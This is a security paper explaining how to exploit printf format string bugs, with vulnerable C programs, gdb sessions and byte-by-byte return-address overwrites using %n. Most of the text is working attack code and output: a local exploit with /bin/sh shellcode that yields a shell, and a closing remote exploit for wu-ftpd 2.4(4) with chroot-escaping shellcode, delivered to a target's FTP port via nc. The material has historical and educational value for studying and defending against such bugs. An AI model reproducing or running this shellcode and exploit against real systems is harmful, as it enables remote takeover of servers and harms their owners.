More info on format bugs.
Pascal Bouchareine [ kalou ]
-
I Abstract
This paper tries to explain how to exploit a printf(userinput) format
bug, as reported in some recent advisories. The approach starts from first
principles; in particular, it does not build on any existing exploit
(wu-ftpd, ...).
A general knowledge of C programming and assembler is assumed throughout
this article (stack issues, registers, endian storage).
II Playground
Let's begin with an experiment. Have a look at the following code :
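#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(void)
{
    char tmp[512];
    char buf[512];

    while (1) {
        memset(buf, '\0', 512);
        read(0, buf, 512);
        sprintf(tmp, buf);  /* deliberate bug: user input is the format */
        printf("%s", tmp);
    }
}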
It allocates stack space for tmp and buf (buf having the lower address
on the stack), reads user input into buf, calls sprintf to fill tmp, and
prints out tmp.
Let's try it :
[pb@camel][formats]> ./t
foo-bar
foo-bar
%x %x %x %x
25207825 78252078 a782520 0
Clumsy coders are used to seeing this kind of thing, but let's see exactly
what happens.
When sprintf encounters a conversion specifier, it simply takes the next
word (32 bits, 4 bytes on Intel) from the place on the stack where its
arguments should be and, in the case of the "%x" converter, formats it as
hexadecimal.
If the arguments are explicitly given, this works well. If they are missing,
nothing was pushed for sprintf to consume, so the function reads the caller's
stack directly, because the stack grows downward (Intel architecture in the
example) and the caller's data sits right above the pushed arguments.
For more details, let's look at the same program under gdb:
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(gdb) break sprintf
Breakpoint 1 at 0x80481f3
(gdb) run
Starting program: /usr/home/pb/code/format/./t
%x
Breakpoint 1, 0x80481f3 in _IO_sprintf ()
(gdb) x/20x $esp
0xbffff670: 0xbffffa80 0x080481af 0xbffff880 0xbffff680
0xbffff680: 0x000a7825 0x00000000 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000000 0x00000000 0x00000000
* 0xbffffa80 and 0x080481af are a plain stack frame footer
* 0xbffffa80 is the calling function's stack frame address
* 0x080481af is the return address in main().
Then there are two arguments for sprintf :
* 0xbffff880 is tmp[]'s address
* 0xbffff680 is buf[]'s address
Look at what comes just after this, at address 0xbffff680.
Yep, this is the beginning of main's stack frame, with the 0x400 bytes
allocated for tmp[] and buf[], and it holds what was entered as input:
0x000a7825 (little endian: %x\n).
Let's look at the first example again:
[pb@camel][formats]> ./t
%x %x %x %x
25207825 78252078 a782520 0
The %x converter makes sprintf hit a part of the stack where you have :
"\x25\x78\x20\x25....\x78\x0a\x00\x00\x00\x00"
This is buf[]'s content, with the 0 terminating byte [a word in this case].
Let's study this in more detail by adding a function named do_it, whose only
local data is the 4-byte word 0x04030201, and let's see what happens when
sprintf(dst, "%x") is called from it:
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void do_it(char *d, char *s)
{
    char buf[] = "\x01\x02\x03\x04";

    sprintf(d, s);
}

int main(void)
{
    char tmp[512];
    char buf[512];

    while (1) {
        memset(buf, '\0', 512);
        read(0, buf, 512);
        do_it(tmp, buf);
        printf("%s", tmp);
    }
}
As expected, sprintf hits do_it()'s buf[] word. Here %#010x is used as the
format converter:
[pb@camel][formats]> ./t
%#010x
0x04030201
So one has access to do_it()'s stack contents, and can guess main()'s
stack frame address, and do_it's return address with ease:
[pb@camel][formats]> ./t
%#010x %x %x %x
0x04030201 bffffa00 bffffac0 80485af
Let's suppose the second word (0xbffffa00) is space allocated for pushing
sprintf's arguments; 0xbffffac0 and 0x080485af, however, really are the saved
ebp and the return address:
(gdb) bt
#0 0x8048526 in do_it ()
#1 0x80485af in main ()
(gdb) x/2x $ebp
0xbffff6b0: 0xbffffac0 0x080485af
So one easily gets the calling function's stack frame address.
In this example, you can remotely guess both the location of a return
address to overwrite (main's, for example) AND the address of the eggshell
(if any). The return address location is found by adding 0x04 to the caller's
saved $ebp: the second element of the ($ebp, ret) pair is at
0xbffffac0 + 0x04 == 0xbffffac4:
(gdb) x 0xbffffac4
0xbffffac4: 0x080484be
(gdb) bt
#0 0x8048526 in do_it ()
#1 0x80485af in main ()
#2 0x80484be in ___crt_dummy__ ()
So main's return address (#2) is in ___crt_dummy__ for the time being, but can
be changed to anything you want if you can overwrite contents of 0xbffffac4...
As for the eggshell address, there are many ways to guess it. The simplest is
to find buf[]'s address, which is [bottom of main's stack] - 0x200 + the size
of some other stack-allocated data:
(gdb) break memset
Breakpoint 1 at 0x8048408
(gdb) c
Continuing.
%#010x %x %x %x
0x04030201 bffffa00 bffffa20 80485af
Breakpoint 1, 0x40078428 in memset ()
(gdb) printf "%s\n", 0xbffffa00 - 0x200 + 0x20
%#010x %x %x %x
Although this depends heavily on the program you are running, you can
see that finding a writable return address on the stack and an executable
eggshell on the stack is quite easy.
However, the best way to guess stack architecture remotely, when one
has no access to the running process, is to "eat" the stack with many
"%x" or "%...s" format converters until a [stack address, code segment address]
pair is found and the user input string itself is dumped.
Eating stack space with "junk" format converters until the beginning of input
string is found is a really nice way to control what happens next: you now
have controllable arguments to "%*" format converters, and this really, really
comes in handy. Have a look at this (using the first example) :
[pb@camel][formats]> ./t
AAAA%x
AAAA41414141
Remember, no arguments were pushed. The %x converter makes sprintf take the
beginning of the input buffer as the argument list for the format string.
There are *many* ways to play around with this.
This "let me control the stack" feature is your friend just as gdb is. You can
dump the whole stack, guess stack addresses, and even write to it (as will be
explained later using %n converter).
Let's look at this example :
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static char find_me[] = "..Buffer was lost in memory\n";

int main(void)
{
    char buf[512];
    char tmp[512];

    while (1) {
        memset(buf, '\0', 512);
        read(0, buf, 512);
        sprintf(tmp, buf);
        printf("%s", tmp);
    }
}
The goal is to print the string find_me[]. In this simple example, you
don't have to search (with dummy %x converters) for how many bytes of stack
you need to "eat" before you hit the input buffer: it is the very first word
(the example with "AAAA%x" showed this quite clearly). So you basically just
have to issue the following "pseudo string" to print out the buffer:
[4 bytes address of find_me]%s
Yes! It is *that* simple: in this case, the input buffer is both the format
string AND the format string argument.. :)
Let's do it simply :
[pb@camel][formats]> printf "\x02\x96\x04\x08%s\n" | ./v
(garbage)Buffer was lost in memory
The garbage is the beginning of the format string (the raw address bytes).
So you are able to dump any part of memory you need to. What was true of
remote buffer overflows no longer holds: you don't NEED to guess the return
address anymore, since you can inspect memory to find it.
(Er, this is true with printf() issues, but not when you can't see what the
input produced. See setproctitle() for example.)
Then comes the second (and more fun) part.
III Writing into memory.
All that wouldn't be much fun if we didn't have the "%n" format converter.
This one takes an (int *) argument, and writes the number of bytes written
*so far* to that location.
Let's try this (with the very-simple-AAAA%x proggy again):
[pb@camel][formats]> printf "\x70\xf7\xff\xbf%%n\n" > file
[pb@camel][formats]> gdb ./t
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu".
(no debugging symbols found)...
(gdb) set args < file
(gdb) break main
Breakpoint 1 at 0x8048529
(gdb) run
Starting program: /usr/home/pb/code/format/./t < file
(no debugging symbols found)...
Breakpoint 1, 0x8048529 in main ()
(gdb) watch *0xbffff770
Hardware watchpoint 2: *3221223280
(gdb) c
Continuing.
Hardware watchpoint 2: *3221223280
Old value = 0
New value = 4
0x400323f3 in vfprintf ()
(gdb) x 0xbffff770
0xbffff770: 0x00000004
This time, the 4 bytes encoded at the start of the format string (an address)
are written out, and the "%n" converter makes sprintf store that count where
it was told to (i.e. 0xbffff770).
Let's play with this a little more. This time, the generated-file looks like
this:
printf "\x70\xf7\xff\xbf\x71\xf7\xff\xbf%%n%%n" > file
After two watchpoint hits, at 0xbffff770 you have:
(gdb) x 0xbffff770
0xbffff770: 0x00000808
sprintf wrote 8 bytes (two addresses), and each "%n" made it store this
count, first at 0xbffff770 and then at 0xbffff771. The two 4-byte stores
overlap, which gives 0x00000808.
Now, suppose you have an eggshell at 0xbffff710, and the guessed
return address lies at 0xbffffa80. You can't afford to write 0xbffff710
bytes into the buffer to make sprintf (through the "%n" converter) write
this value on the stack. Remember that people are usually afraid of buffer
overflows and therefore limit the size of their input buffers :)
But you can use a byte-by-byte construction to build the address.
Since "%n" makes sprintf store the number of bytes written so far, the
length of each following fragment is the next byte value minus the number
of bytes already written.
Since each (int *) store also overwrites the three bytes that follow its
target, you have to write the address from the least significant byte to
the most significant byte.
Since you need to have written 0xff bytes before you can write the 0xbf byte,
and since you can only *increment* the internal number-of-written-bytes
counter, you have to use 0x1bf, overwriting one extra byte on the stack
with 0x01.
Note that you could use the "%hn" converter, and make sprintf store short int
values instead. But this won't be discussed here.
Here is the "address builder" code for what has been explained so far:
main()
{
char b1[255];
char b2[255];
char b3[255];
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b1, '\x90', 0xf7 - 0x10);
memset(b2, '\x90', 0xff - 0xf7);
memset(b3, '\x90', 0x01bf - 0xff);
printf("\x80\xfa\xff\xbf" // arguments to the "%n" converter.
"\x81\xfa\xff\xbf" // ditto
"\x82\xfa\xff\xbf" // ..
"\x83\xfa\xff\xbf" // last byte.
"%%n" // 1) gives 0x10 ( 16 first bytes )
"%s%%n" // 2) gives 0xf7: string len is 0xf7 - 0x10
"%s%%n" // 3) gives 0xff: string len is 0xff - 0xf7
"%s%%n" // 4) gives 0x01bf: string len is 0x01bf - 0xff
,b1, b2, b3);
// you now have 0xbffff710 at 0xbffffa80
}
Let's try it:
(after 3 hits on watchpoint)
(gdb) c
Continuing.
Hardware watchpoint 3: *3221224064
Old value = 16774928
New value = -1073744112
0x400323f3 in vfprintf ()
(gdb) x/2 0xbffffa80
0xbffffa80: 0xbffff710 0xbf000001
It seems to work quite well. The work is almost finished now: you just
have to push an eggshell after all this format trickery, and make the
program jump back into it. Let's try to apply everything said so far
to the following vulnerable program:
IV Sample exploitation.
#include <stdio.h>
#include <string.h>
#include <unistd.h>

void do_it(char *dst, char *src)
{
    int foo;
    char bar;

    sprintf(dst, src);
}

int main(void)
{
    char buf[512];
    char tmp[512];

    memset(buf, '\0', 512);
    read(0, buf, 512);
    do_it(tmp, buf);
    printf("%s", tmp);
    return 0;
}
1) First you have to find where your input buffer is, in order to control
the format string.
[pb@camel][formats]> gcc vuln.c -o v
[pb@camel][formats]> ./v
AAAA %x %c %x
AAAA 0 À bffffac0
(int foo, char bar, stack)
...
AAAA %x %x %x %x %x %x %x %x %x
AAAA 0 bffffac0 bffffac0 804859f bffff6c0 bffff8c0 41414141 62203020 66666666
(the *output* buffer is at offset 28)
Look at the stack frame, which is a (stack addr, code addr) pair: the return
address into main is 0x0804859f, and main's own saved ebp / return address
pair begins at 0xbffffac0.
You now know that main's return address is at 0xbffffac4 (the second part of
the [stack, code] pair is of course at pair + 4).
Then you get some information about main's return address:
printf "AAAA\xc0\xfa\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n" | ./v \
| hexdump
0000000 4141 4141 fac0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fad4 bfff 84be 0804 0a01 000a
stack/ret is 0xbffffad4/0x080484be (check this with gdb).
Supposing do_it's frame is something like 0x400 bytes before main's frame
(in fact, it is 0x410 bytes), you can find do_it's stack frame address,
since you know that it must hold main's frame pointer followed by a
return address in the code segment, and then main's stack.
After a lot of tries you get:
printf "AAAA\xb0\xf6\xff\xbf%%x%%x%%x%%x%%x%%x%%x we try %%s\n\n" | ./v \
| hexdump
0000000 4141 4141 f6b0 bfff 6230 6666 6666 6361
0000010 6230 6666 6666 6361 3830 3430 3538 3838
0000020 6662 6666 3666 3063 6662 6666 3866 3063
0000030 3134 3134 3134 3134 7720 2065 7274 2079
0000040 fac0 bfff 8588 0804 f6c0 bfff f8c0 bfff
0000050 4141 4141 f6b0 bfff 6230 6666 6666 6361
0000060 6230 6666 6666 6361 3830 3430 3538 3838
0000070 6662 6666 3666 3063 6662 6666 3866 3063
0000080 3134 3134 3134 3134 7720 2065 7274 2079
0000090 0a0a
(this prints "..we try [contents of 0xbffff6b0]")
Bingo! There you have ("we try" ends just before offset 0x40)
0xbffffac0, 0x08048588 at 0xbffff6b0.
Remember the (stack, code) address pair? This is in fact do_it's stack
frame.
You can see sprintf's args just after: 0xbffff6c0 and 0xbffff8c0. These
are addresses of the two buffers. 0x41414141 is the beginning of the input
buffer, so you can see that hexdump's offset 0x50 is at address 0xbffff6c0,
and since you are good at math, you confirm that hexdump's offset 0x40 is
indeed at 0xbffff6b0.
This process lets you remotely guess
1) stack return address,
2) buffer address.
You have all the information you need to format the stack, so let's get
to the next step: build the eggshell & the appropriate buffer.
The buffer will lie at 0xbffff8c0. BUT, since it is filled with lots of illegal
instructions (i.e. the format converters), each "\x90" run must end with
a "\xeb\x02" (a short jump) to skip over the "%n" format converter that
follows it. Thanks to this, you need not worry about the exact egg address.
So all you need to do is to push 4 addresses (one address per byte
of the return address to overwrite), a series of "%x" converters to "eat"
stack space, then a series of nops followed by a "%n" converter (in order
to build the return address) and somewhere the eggshell.
Though this is not the easiest part, a little brain boost (coffee, cocaine,
coca-cola(tm), anything you like) leads to :
void main()
{
char b1[255];
char b2[255];
char b3[255];
char b4[255];
char xx[600];
int i;
char egg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
// ( (void (*)()) egg)();
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b4, 0, 255);
memset(xx, 0, 513);
for (i = 0; i < 12 ; i += 2) { /* setup the 6 "%x" to eat stack space */
strcpy(&xx[i], "%x");
}
memset(b1, '\x90', 0xd0 - 16 - 12 - 2 - 28);
// 16 (4 addresses)
// 2 ("\xeb\x02" before %n)
// 40 (%x output - "guess it..")
// use nice formats for
// fixed output size... :)
// + 200- (4 bytes)
memset(b2, '\x90', 0xf8 - 0xd0 - 2); // first 0x90 string is at
// 0xbffff8d0.. (c0 + 4 * 4 bytes) :)
// -2 because of "\xeb\x02"
memset(b3, '\x90', 0xff - 0xf8 - 2); // ditto, with -2.
memset(b4, '\x90', 0x01bf - 0xff - 2); // ditto.
printf("\xb4\xf6\xff\xbf" //
"\xb5\xf6\xff\xbf" // this points to do_it's
"\xb6\xf6\xff\xbf" // return address storage word.
"\xb7\xf6\xff\xbf" //
"%s" // 0) there are 6 "%x", to eat stack until the input buf
// begins to control the format strings.
"%s\xeb\x02%%n" // 1) gives 0xd0 (4 * 4 bytes add, %x are ignored )
"%s\xeb\x02%%n" // 2) gives 0xf8
"%s\xeb\x02%%n" // 3) gives 0xff
"%s\xeb\x02%%n%s" // 4) gives 0x01bf
, xx, b1, b2, b3, b4, egg);
}
Let's give it a final try:
[pb@camel][formats]> ( ./b ; cat ) | ./v
id
uid=1001(pb) gid=100(users) groups=100(users)
date
Sat Jul 15 22:15:07 CEST 2000
V Conclusion.
These format bugs are really nasty. First, if you can read the output
of the final buffer (e.g. printf(Userinput)), you effectively have control
over the machine processing it: you have a kind of remote debugger access
to the process, which lets you get in at the first try. This is bad
news for developers. (The wu-ftpd format bug, used by a well-informed person,
is a one-try remote root.)
Playing around with format args and pointers allows us to construct a
kind of "generic format string" that will *certainly* overwrite the caller's
return address. This must be coupled with a remote guess of the return
address to work properly, but gives *at least* the same success rate as
remote buffer overruns. Even if you don't see what you do (setproctitle),
this is still an easy way to get in.
VI - garbage & greetings -
This is what I built against my old wu-ftpd [wu-2.4(4)] using
the above technique. It worked, but I had to cut my input format
string to 512 bytes: I put the eggshell in another part of memory,
using the PASS command. Its address is still easy to guess.
/*
* Sample example - part 2: wu-ftpd v2.4(4), exploitation.
*
* usage:
* 1) find the right address location/eggshell location
* this is easy with a little play around %s and hexdump.
* Then, fix this exploit.
*
* 2) (echo "user ftp"; ./exploit; cat) | nc host 21
*
* echo ^[c to clear your screen if needed.
*
* Don't forget 0xff must be escaped with 0xff.
*
*
*/
main()
{
char b1[255];
char b2[255];
char b3[255];
char b4[255];
char xx[600];
int i;
char egg[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80"
"\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
// ( (void (*)()) egg)();
memset(b1, 0, 255);
memset(b2, 0, 255);
memset(b3, 0, 255);
memset(b4, 0, 255);
memset(xx, 0, 513);
for (i = 0; i < 20 ; i += 2) { /* set up the 10 %x to eat stack space */
strcpy(&xx[i], "%x");
}
memset(b1, '\x90', 0xa3 - 0x50);
memset(b2, '\x90', 0xfe - 0xa3 - 2);
memset(b3, '\x90', 0xff - 0xfe);
memset(b4, '\x90', 0x01bf - 0xff); // build ret address here.
// i found 0xbffffea3
printf("pass %s@oonanism.com\n", egg);
printf("site exec .."
"\x64\xf9\xff\xff\xbf" // insert ret location there.
"\x65\xf9\xff\xff\xbf" // i had 0xbffff964
"\x66\xf9\xff\xff\xbf"
"\x67\xf9\xff\xff\xbf"
"%s"
"%s\xeb\x02%%n"
"%s\xeb\x02%%n"
"%s%%n"
"%s%%n\n"
, xx, b1, b2, b3, b4);
}
- many thanks to... ("grep yourself or ignore this part")
The best goes to Ouaou - Ignacy Gawedzki , who drastically
changed this article and made something understandable with it.
My english sucks, he's a babelfish..
Flaoua, my roomy, helped a lot, bearing me, my machines and my monomania.
Try her cookies someday.
Gaius, cleb - I need a beer.
HERT guys, since they own me.
ADM, great, productive work, and with humor, doh.
Michal Zalewski, Solar Designer - they're my heroes.
Enough greetings for such a bad paper, hope you enjoyed it.